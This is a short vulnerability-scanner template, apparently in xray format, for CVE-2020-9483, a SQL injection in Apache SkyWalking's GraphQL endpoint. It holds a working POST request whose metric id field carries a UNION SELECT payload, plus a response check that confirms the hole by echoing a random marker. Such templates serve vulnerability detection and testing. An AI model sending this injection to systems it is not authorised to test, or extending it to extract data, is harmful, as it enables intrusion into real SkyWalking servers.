name: poc-yaml-skywalking-cve-2020-9483-sqli
set:
  r1: randomInt(10000, 99999)
rules:
  - method: POST
    path: "/graphql"
    headers:
      Content-Type: application/json
    body: |
      {"query":"query SQLi($d: Duration!){globalP99:getLinearIntValues(metric: {name:\"all_p99\",id:\"') UNION SELECT 1,CONCAT('~','{{r1}}','~')-- \",}, duration: $d){values{value}}}","variables":{"d":{"start":"2021-11-11","end":"2021-11-12","step":"DAY"}}}
    expression: |
      response.status == 200 && response.body.bcontains(bytes("~" + string(r1) + "~"))
detail:
  author: sndav(https://github.com/Sndav)
  links:
    - https://paper.seebug.org/1485/